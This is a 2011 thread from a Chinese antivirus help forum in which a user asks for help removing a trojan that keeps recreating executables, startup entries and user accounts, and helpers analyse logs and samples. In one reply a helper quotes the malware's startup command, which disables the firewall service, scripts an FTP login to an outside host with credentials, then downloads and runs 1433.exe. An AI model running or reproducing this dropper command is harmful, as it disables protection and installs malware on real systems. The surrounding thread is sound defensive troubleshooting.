瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 系统里的木马会不断重建用户和启动项

1   1  /  1  页   跳转

[求助] 系统里的木马会不断重建用户和启动项

系统里的木马会不断重建用户和启动项

呃,最近电脑中了木马,不断的会在system32的文件夹中重复出现1433.exe qq.exe 1.exe 123.exe诸如此类的文件,在开机启动项里会出现estnod32的那个启动项,间隔几次开机又会创建账户,删除了之后仍旧会这样出现。
现在已经用过瑞星,360的杀毒软件,还有360的急救箱等进入安全模式进行查杀,然后仍旧没有效果。
第一次来这便是求助,实在有些冒昧,不过实在是没有办法了,望达人指点,万分感谢!

ps:不太清楚论坛怎么上传图片,所以只好打包了一些截了的图片上来,不知道有用没....

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Maxthon 2.0)

附件附件:

下载次数:152
文件类型:application/octet-stream
文件大小:
上传时间:2011-4-2 13:31:14
描述:rar

分享到:
gototop
 

回复 1F zxb726 的帖子

下载sreng工具,扫描日志压缩发来。
http://www.kztechs.com/sreng/download.html
gototop
 

回复: 系统里的木马会不断重建用户和启动项

瑞星防护时的病毒名称是beckdoor.win32.genfxj.c
还有win32.parite.aj

附件附件:

文件名:SREngLOG.log
下载次数:200
文件类型:application/octet-stream
文件大小:
上传时间:2011-4-2 13:47:49
描述:log

gototop
 

回复 3F zxb726 的帖子

c:\windows\system32\vmprp331.ax 找到压缩发来。
全盘搜索ctfmon.exe找到一并压缩发来。
gototop
 

回复: 系统里的木马会不断重建用户和启动项



引用:
原帖由 networkedition 于 2011-4-2 14:04:00 发表
c:\windows\system32\vmprp331.ax 找到压缩发来。
全盘搜索ctfmon.exe找到一并压缩发来。

附件附件:

文件名:ctfmon1.rar
下载次数:159
文件类型:application/octet-stream
文件大小:
上传时间:2011-4-2 14:28:15
描述:rar

附件附件:

文件名:ctfmon2.rar
下载次数:151
文件类型:application/octet-stream
文件大小:
上传时间:2011-4-2 14:28:15
描述:rar

附件附件:

文件名:ctfmon3.rar
下载次数:168
文件类型:application/octet-stream
文件大小:
上传时间:2011-4-2 14:28:15
描述:rar

gototop
 

回复: 系统里的木马会不断重建用户和启动项



引用:
原帖由 networkedition 于 2011-4-2 14:04:00 发表
c:\windows\system32\vmprp331.ax 找到压缩发来。
全盘搜索ctfmon.exe找到一并压缩发来。

附件附件:

文件名:vmprp331.rar
下载次数:182
文件类型:application/octet-stream
文件大小:
上传时间:2011-4-2 14:28:49
描述:rar

附件附件:

下载次数:169
文件类型:application/octet-stream
文件大小:
上传时间:2011-4-2 14:28:49
描述:rar

gototop
 

回复:系统里的木马会不断重建用户和启动项

呃。。。待会要上课了,所以还需要上传什么文件,要等到晚上了。。。
gototop
 

回复 7F zxb726 的帖子

使用sreng工具修复一下启动项,<shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open zi838.gicp.net > cmd.txt&echo cmusic>> cmd.txt&echo hjkasd1002>> cmd.txt&echo binary >> cmd.txt&echo get 1433.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1433.exe&1433.exe&>  [(Verified)Microsoft Windows],修复完成后重启电脑再使用杀毒软件进行全盘杀毒。
gototop
 

回复:系统里的木马会不断重建用户和启动项

第一第二个ctfmon不是病毒

第三个是windows7里面的ctfmon.exe
XP下无法运行
gototop
 

回复:系统里的木马会不断重建用户和启动项

目前看来,问题已经解决了,如果还有问题的话我再来这个帖子好了
非常感谢!
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT